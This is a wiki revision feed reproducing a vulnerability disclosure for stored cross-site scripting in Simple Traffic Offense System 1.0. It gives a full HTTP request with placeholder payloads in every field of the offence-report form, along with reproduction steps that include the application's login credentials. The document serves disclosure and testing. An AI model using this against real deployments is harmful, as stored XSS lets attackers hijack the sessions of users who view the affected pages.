https://pwnwiki.com/index.php?action=history&feed=atom&title=Simple_Traffic_Offense_System_1.0_XSS%E6%BC%8F%E6%B4%9E
Simple Traffic Offense System 1.0 XSS漏洞 - Revision history
2026-04-14T14:51:40Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Simple_Traffic_Offense_System_1.0_XSS%E6%BC%8F%E6%B4%9E&diff=6081&oldid=prev
Pwnwiki: Created page with "<pre> # Exploit Title: Simple Traffic Offense System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS) # Date: 30-06-2021 # Exploit Author: Barış Yıldızoğlu # Vendor Hom..."
2021-06-30T13:53:03Z
<p>Created page with "<pre> # Exploit Title: Simple Traffic Offense System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS) # Date: 30-06-2021 # Exploit Author: Barış Yıldızoğlu # Vendor Hom..."</p>
<p><b>New page</b></p><div><pre><br />
# Exploit Title: Simple Traffic Offense System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS)<br />
# Date: 30-06-2021<br />
# Exploit Author: Barış Yıldızoğlu<br />
# Vendor Homepage: https://www.sourcecodester.com/<br />
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/trafic.zip<br />
# Version: 1.0<br />
# Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3<br />
<br />
# Description: Almost all inputs contain Stored XSS on the website<br />
<br />
Request:<br />
<br />
POST /Trafic/save-reported.php HTTP/1.1<br />
Host: 127.0.0.1<br />
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101<br />
Firefox/78.0<br />
Accept:<br />
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />
Accept-Language: en-US,en;q=0.5<br />
Accept-Encoding: gzip, deflate<br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: 168<br />
Origin: http://127.0.0.1<br />
Connection: close<br />
Referer: http://127.0.0.1/Trafic/report-offence.php<br />
Cookie: PHPSESSID=vbsq5n2m09etst1mfcmq84gifo<br />
Upgrade-Insecure-Requests: 1<br />
<br />
offence_id={Payload here}&vehicle_no={Payload here}&driver_license={Payload<br />
here}&name={Payload here}&address={Payload here}&gender={Payload<br />
here}&officer_reporting={Payload here}&offence={Payload here}<br />
<br />
<br />
# Steps to Reproduce:<br />
[1.] Login to the system [+] username=Torrahclef&pass=yemiyemi<br />
[2.] Go to the Report Offense page<br />
[3.] Send the request above with the Stored XSS payload<br />
[4.] Dashboard and Offense list pages will be triggered<br />
</pre></div>
Pwnwiki